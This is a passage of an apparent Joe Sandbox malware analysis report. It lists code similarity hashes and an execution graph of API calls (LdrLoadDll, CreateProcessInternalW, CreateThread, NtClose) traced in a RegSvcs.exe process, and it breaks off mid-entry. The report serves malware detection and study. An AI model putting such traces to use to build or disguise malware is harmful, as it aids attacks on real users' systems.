                                                                                                              • API String ID: 3446177414-3526935505
                                                                                                              • Opcode ID: 360ef59dbbfa1f34fc423ee2aa392aee743f1b01508437fe83cdc796f6717b3a
                                                                                                              • Instruction ID: 99522c3af3191865ddd014cc066a57636b51a9aa7ac41bde2d25b6e54d4e4ca7
                                                                                                              • Opcode Fuzzy Hash: 360ef59dbbfa1f34fc423ee2aa392aee743f1b01508437fe83cdc796f6717b3a
                                                                                                              • Instruction Fuzzy Hash: 3E31F931518784DFD722EB28CC0ABE677E4EF02724F145066F44A677A2C7A8ACC5D751
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DebugPrintTimes
                                                                                                              • String ID: $
                                                                                                              • API String ID: 3446177414-3993045852
                                                                                                              • Opcode ID: 67a50b98b83db77c3cd806bb6266a485b06cec460ecfd140d46c495ffa9a589b
                                                                                                              • Instruction ID: 8bfd5efe674e2ac0bc11ebba77209d34035c8f444fe36145cd95fae52a87a1b4
                                                                                                              • Opcode Fuzzy Hash: 67a50b98b83db77c3cd806bb6266a485b06cec460ecfd140d46c495ffa9a589b
                                                                                                              • Instruction Fuzzy Hash: 98111E72904618EBCF15AF94EC48AAD7B71FF45760F108525F926672E0CB765E40EF40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a55c3ebad1ef3fedff9a0f5793e6a16abedf64912aa2c4bcab1659f0daf8edb2
                                                                                                              • Instruction ID: 116b3a994b2a17f278cac995de3b6b990fb52d15ac0678db1e72ca29af6d4367
                                                                                                              • Opcode Fuzzy Hash: a55c3ebad1ef3fedff9a0f5793e6a16abedf64912aa2c4bcab1659f0daf8edb2
                                                                                                              • Instruction Fuzzy Hash: 9DE1EC71D00608DFCB25CFA9C984AADBBF1FF48314F24556AE546AB362D771A882DF10
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DebugPrintTimes
                                                                                                              • String ID:
                                                                                                              • API String ID: 3446177414-0
                                                                                                              • Opcode ID: fbc6f4be887edaeb4fc08b5704dd65615b094fcbfc6f8bd96b403b96d7d28028
                                                                                                              • Instruction ID: 7ce43b40185640828d4ac5300f5737bc6e216fbf3927eb06e81d612e71ee8452
                                                                                                              • Opcode Fuzzy Hash: fbc6f4be887edaeb4fc08b5704dd65615b094fcbfc6f8bd96b403b96d7d28028
                                                                                                              • Instruction Fuzzy Hash: ED713272E10229DFDF04CFA4E984AEDBBB5BF48310F14407AE905AB251D734A909DBA1
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DebugPrintTimes
                                                                                                              • String ID:
                                                                                                              • API String ID: 3446177414-0
                                                                                                              • Opcode ID: 6de4baff3bdead187fec5e549723f6ab3671370f0e9ab3ecc1c19d5c22358f17
                                                                                                              • Instruction ID: 939f6cbe28962d5d3c5ab51c6e0e8253391d6d8eac5536cab872440808c54012
                                                                                                              • Opcode Fuzzy Hash: 6de4baff3bdead187fec5e549723f6ab3671370f0e9ab3ecc1c19d5c22358f17
                                                                                                              • Instruction Fuzzy Hash: E35101B2E10229DFDF08CF98E845AEDBBB5BF49314F14817AE805AB290D3749909DF54
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 4281723722-0
                                                                                                              • Opcode ID: ba10e8ecca29e6866d805131d8f58915ecafde1015a93584fb93759c241dcca8
                                                                                                              • Instruction ID: 67a17ba6547a79336ad5fae99e6e89f35f749f4b92dde18f2f91fb283945f24b
                                                                                                              • Opcode Fuzzy Hash: ba10e8ecca29e6866d805131d8f58915ecafde1015a93584fb93759c241dcca8
                                                                                                              • Instruction Fuzzy Hash: 7E312975E406299FCF11DFA8E845AADBBF0BB49720F144129E511F7290CB745D00EF54
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @
                                                                                                              • API String ID: 0-2766056989
                                                                                                              • Opcode ID: df9f844c8a1671741ca1f03edcdc8fff674bbaeb59d462898dbc438f0c035089
                                                                                                              • Instruction ID: eb2277d730123f09918db409ae21eec32cddc1ed013111a662d575c2d43685ad
                                                                                                              • Opcode Fuzzy Hash: df9f844c8a1671741ca1f03edcdc8fff674bbaeb59d462898dbc438f0c035089
                                                                                                              • Instruction Fuzzy Hash: 72326571D04669DFDB21DF64C984BEABBB0BB08304F1050E9E549B7282DBB49E84DF90
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-
                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                              • Opcode ID: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                                                                              • Instruction ID: 81db6938460dfd3b165363760ed3e7ddd34b28e6cad60c084b411811d6755ed0
                                                                                                              • Opcode Fuzzy Hash: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                                                                              • Instruction Fuzzy Hash: 3391AF71F0820E9BDF24DE69C881ABEB7A1EF44324F64665AEA95F72C0DB309D41C710
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DebugPrintTimes
                                                                                                              • String ID: Bl$l
                                                                                                              • API String ID: 3446177414-208461968
                                                                                                              • Opcode ID: 6b772705dd1e69711ae53ed9bea23ba79798c7be8aeeb86bd7798a3fbf965c2e
                                                                                                              • Instruction ID: 871b07cc632fd977f95271282b82681e966931addfd31361e0fd0c173d85a206
                                                                                                              • Opcode Fuzzy Hash: 6b772705dd1e69711ae53ed9bea23ba79798c7be8aeeb86bd7798a3fbf965c2e
                                                                                                              • Instruction Fuzzy Hash: F0A1C170A083689BEB249B18CD81FAAB7B5BB45304F0450FDD509B7241CB76AE86CB52
                                                                                                              APIs
                                                                                                              • __startOneArgErrorHandling.LIBCMT ref: 00EF5E34
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorHandling__start
                                                                                                              • String ID: pow
                                                                                                              • API String ID: 3213639722-2276729525
                                                                                                              • Opcode ID: 730f8e02fedd48d005a6ad1b3f7cd9e7efa22c9975e145533bb7e7d54fe160af
                                                                                                              • Instruction ID: 8f42bc81f751d5ae904da148c9d8ab67f724e4ad2a1d9341b8b45071ffeba19a
                                                                                                              • Opcode Fuzzy Hash: 730f8e02fedd48d005a6ad1b3f7cd9e7efa22c9975e145533bb7e7d54fe160af
                                                                                                              • Instruction Fuzzy Hash: F5518B73A09A0DD6C7117714C9123BA3BD4EB50704F30AD98F3E6A62A9EF348E949646
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0$Flst
                                                                                                              • API String ID: 0-758220159
                                                                                                              • Opcode ID: 215ca67e11116a5d89323a077fe3e83e66351be7ecf357db73589b578fab7ff2
                                                                                                              • Instruction ID: b62521856e3ed35cf03c3918024bb39c289e4e40784798a0d3410e3453e1fda7
                                                                                                              • Opcode Fuzzy Hash: 215ca67e11116a5d89323a077fe3e83e66351be7ecf357db73589b578fab7ff2
                                                                                                              • Instruction Fuzzy Hash: 71519CF1E00699CFDF25CF96D8846A9FBF5EF54318F24802AD049AB290E7749D81CB80
                                                                                                              APIs
                                                                                                              • RtlDebugPrintTimes.NTDLL ref: 00EDD959
                                                                                                                • Part of subcall function 00EB4859: RtlDebugPrintTimes.NTDLL ref: 00EB48F7
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DebugPrintTimes
                                                                                                              • String ID: $$$
                                                                                                              • API String ID: 3446177414-233714265
                                                                                                              • Opcode ID: 3d568d840480981b2679f1ea161ac870048b9b80bca60e739c46119c74386dfa
                                                                                                              • Instruction ID: 1f821b860fd3c2f4143e8016b20ca0876df32ebbdc7e59045f3ceb7661aee381
                                                                                                              • Opcode Fuzzy Hash: 3d568d840480981b2679f1ea161ac870048b9b80bca60e739c46119c74386dfa
                                                                                                              • Instruction Fuzzy Hash: 2851FDB1E083499FCB19DFA4C88179DBBB1FB45318F24506AE4017B392C775A886EB80
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.2152872422.0000000000EA6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F06000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000F42000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000E.00000002.2152872422.0000000000FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_e80000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DebugPrintTimes
                                                                                                              • String ID: 0$0
                                                                                                              • API String ID: 3446177414-203156872
                                                                                                              • Opcode ID: c161ce4fdb5a6ef72707f18af11cd72f5145577679920886f0445660ac174f77
                                                                                                              • Instruction ID: 22f4bb2a9317c33e2a4ba52075fe2eec4c6c82f40b26953cdc89c317d1eaad8c
                                                                                                              • Opcode Fuzzy Hash: c161ce4fdb5a6ef72707f18af11cd72f5145577679920886f0445660ac174f77
                                                                                                              • Instruction Fuzzy Hash: E04149B16087069FC310CF28C984A5BBBE4BB8D318F04492EF589EB341D771EA05CB96

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:2.5%
                                                                                                              Dynamic/Decrypted Code Coverage:4.1%
                                                                                                              Signature Coverage:1.5%
                                                                                                              Total number of Nodes:468
                                                                                                              Total number of Limit Nodes:76
                                                                                                              execution_graph 99440 50b010 99445 50ad20 99440->99445 99442 50b01d 99459 50a990 99442->99459 99444 50b039 99446 50ad45 99445->99446 99470 508620 99446->99470 99449 50ae90 99449->99442 99451 50aea7 99451->99442 99452 50ae9e 99452->99451 99454 50af95 99452->99454 99489 50a3e0 99452->99489 99456 50affa 99454->99456 99498 50a750 99454->99498 99502 51b840 99456->99502 99460 50a9a6 99459->99460 99467 50a9b1 99459->99467 99461 51b920 RtlAllocateHeap 99460->99461 99461->99467 99462 50a9d8 99462->99444 99463 508620 GetFileAttributesW 99463->99467 99464 50acf5 99465 50ad0e 99464->99465 99466 51b840 RtlFreeHeap 99464->99466 99465->99444 99466->99465 99467->99462 99467->99463 99467->99464 99468 50a3e0 RtlFreeHeap 99467->99468 99469 50a750 RtlFreeHeap 99467->99469 99468->99467 99469->99467 99471 508641 99470->99471 99472 508648 GetFileAttributesW 99471->99472 99473 508653 99471->99473 99472->99473 99473->99449 99474 513630 99473->99474 99475 51363e 99474->99475 99476 513645 99474->99476 99475->99452 99505 504840 99476->99505 99478 51367a 99479 513689 99478->99479 99515 513100 LdrLoadDll LdrLoadDll 99478->99515 99485 513834 99479->99485 99512 51b920 99479->99512 99482 5136a2 99483 51382a 99482->99483 99482->99485 99486 5136be 99482->99486 99484 51b840 RtlFreeHeap 99483->99484 99483->99485 99484->99485 99485->99452 99486->99485 99487 51b840 RtlFreeHeap 99486->99487 99488 51381e 99487->99488 99488->99452 99490 50a406 99489->99490 99520 50de20 99490->99520 99492 50a478 99494 50a5fa 99492->99494 99495 50a496 99492->99495 99493 50a5df 99493->99452 99494->99493 99496 50a2a0 RtlFreeHeap 99494->99496 99495->99493 99525 50a2a0 99495->99525 99496->99494 99499 50a776 99498->99499 99500 50de20 RtlFreeHeap 99499->99500 99501 50a7fd 99500->99501 99501->99454 99533 519b10 99502->99533 99504 50b001 99504->99442 99507 504864 99505->99507 99506 50486b 99506->99478 99507->99506 99509 50488a 99507->99509 99516 51ccc0 LdrLoadDll 99507->99516 99510 5048b7 99509->99510 99511 5048ad LdrLoadDll 99509->99511 99510->99478 99511->99510 99517 519ac0 99512->99517 99514 51b938 99514->99482 99515->99479 99516->99509 99518 519ada 99517->99518 99519 519aeb RtlAllocateHeap 99518->99519 99519->99514 99522 50de23 99520->99522 99521 50de51 99521->99492 99522->99521 99523 51b840 RtlFreeHeap 99522->99523 99524 50de94 99523->99524 99524->99492 99526 50a2bd 99525->99526 99529 50deb0 99526->99529 99528 50a3c3 99528->99495 99530 50ded4 99529->99530 99531 50df7e 99530->99531 99532 51b840 RtlFreeHeap 99530->99532 99531->99528 99532->99531 99534 519b2d 99533->99534 99535 519b3e RtlFreeHeap 99534->99535 99535->99504 99536 505e90 99541 5083b0 99536->99541 99538 505ec0 99540 505eec 99538->99540 99545 508330 99538->99545 99542 5083c3 99541->99542 99552 518cd0 99542->99552 99544 5083ee 99544->99538 99546 508374 99545->99546 99547 508395 99546->99547 99558 518aa0 99546->99558 99547->99538 99549 508385 99550 5083a1 99549->99550 99563 5197a0 99549->99563 99550->99538 99553 518d4e 99552->99553 99555 518cfe 99552->99555 99557 4522dd0 LdrInitializeThunk 99553->99557 99554 518d73 99554->99544 99555->99544 99557->99554 99559 518ace 99558->99559 99560 518b1d 99558->99560 99559->99549 99566 4524650 LdrInitializeThunk 99560->99566 99561 518b42 99561->99549 99564 5197ba 99563->99564 99565 5197cb NtClose 99564->99565 99565->99547 99566->99561 99567 5075d0 99568 5075e8 99567->99568 99570 507642 99567->99570 99568->99570 99571 50b540 99568->99571 99572 50b566 99571->99572 99573 50b78d 99572->99573 99598 519ba0 99572->99598 99573->99570 99575 50b5dc 99575->99573 99601 51ca10 99575->99601 99577 50b5fb 99577->99573 99578 50b6cc 99577->99578 99607 518dd0 99577->99607 99580 505e10 LdrInitializeThunk 99578->99580 99582 50b6e8 99578->99582 99580->99582 99586 50b775 99582->99586 99614 518940 99582->99614 99583 50b6b4 99587 5083b0 LdrInitializeThunk 99583->99587 99584 50b666 99584->99573 99584->99583 99585 50b695 99584->99585 99611 505e10 99584->99611 99629 514a50 LdrInitializeThunk 99585->99629 99588 5083b0 LdrInitializeThunk 99586->99588 99592 50b6c2 99587->99592 99593 50b783 99588->99593 99592->99570 99593->99570 99594 50b74c 99619 5189f0 99594->99619 99596 50b766 99624 518b50 99596->99624 99599 519bba 99598->99599 99600 519bcb CreateProcessInternalW 99599->99600 99600->99575 99602 51c980 99601->99602 99603 51c9dd 99602->99603 99604 51b920 RtlAllocateHeap 99602->99604 99603->99577 99605 51c9ba 99604->99605 99606 51b840 RtlFreeHeap 99605->99606 99606->99603 99608 518dea 99607->99608 99630 4522c0a 99608->99630 99609 50b65d 99609->99578 99609->99584 99613 505e4e 99611->99613 99633 518fa0 99611->99633 99613->99585 99615 51896e 99614->99615 99616 5189bd 99614->99616 99615->99594 99639 45239b0 LdrInitializeThunk 99616->99639 99617 5189e2 99617->99594 99620 518a6d 99619->99620 99621 518a1e 99619->99621 99640 4524340 LdrInitializeThunk 99620->99640 99621->99596 99622 518a92 99622->99596 99625 518bca 99624->99625 99627 518b7b 99624->99627 99641 4522fb0 LdrInitializeThunk 99625->99641 99626 518bef 99626->99586 99627->99586 99629->99583 99631 4522c11 99630->99631 99632 4522c1f LdrInitializeThunk 99630->99632 99631->99609 99632->99609 99634 51904d 99633->99634 99635 518fce 99633->99635 99638 4522d10 LdrInitializeThunk 99634->99638 99635->99613 99636 519092 99636->99613 99638->99636 99639->99617 99640->99622 99641->99626 99642 4522ad0 LdrInitializeThunk 99643 509ed3 99644 509edf 99643->99644 99645 509ee6 99644->99645 99646 51b840 RtlFreeHeap 99644->99646 99646->99645 99647 5070d6 99648 507080 99647->99648 99651 5070e0 99647->99651 99652 5081e0 99648->99652 99650 5070ae 99653 5081fd 99652->99653 99659 518ec0 99653->99659 99655 50824d 99656 508254 99655->99656 99657 518fa0 LdrInitializeThunk 99655->99657 99656->99650 99658 50827d 99657->99658 99658->99650 99660 518f58 99659->99660 99662 518eeb 99659->99662 99664 4522f30 LdrInitializeThunk 99660->99664 99661 518f91 99661->99655 99662->99655 99664->99661 99665 502a57 99668 506590 99665->99668 99667 502a73 99669 5065c3 99668->99669 99670 5065e4 99669->99670 99675 519300 99669->99675 99670->99667 99672 506607 99672->99670 99673 5197a0 NtClose 99672->99673 99674 506687 99673->99674 99674->99667 99676 51931d 99675->99676 99679 4522ca0 LdrInitializeThunk 99676->99679 99677 519349 99677->99672 99679->99677 99680 5010db PostThreadMessageW 99681 5010ed 99680->99681 99682 4f9d80 99683 4f9d8f 99682->99683 99684 4f9dd0 99683->99684 99685 4f9dbd CreateThread 99683->99685 99686 518c00 99687 518c8c 99686->99687 99689 518c2b 99686->99689 99691 4522ee0 LdrInitializeThunk 99687->99691 99688 518cbd 99691->99688 99692 51c940 99693 51b840 RtlFreeHeap 99692->99693 99694 51c955 99693->99694 99695 516340 99696 51639a 99695->99696 99698 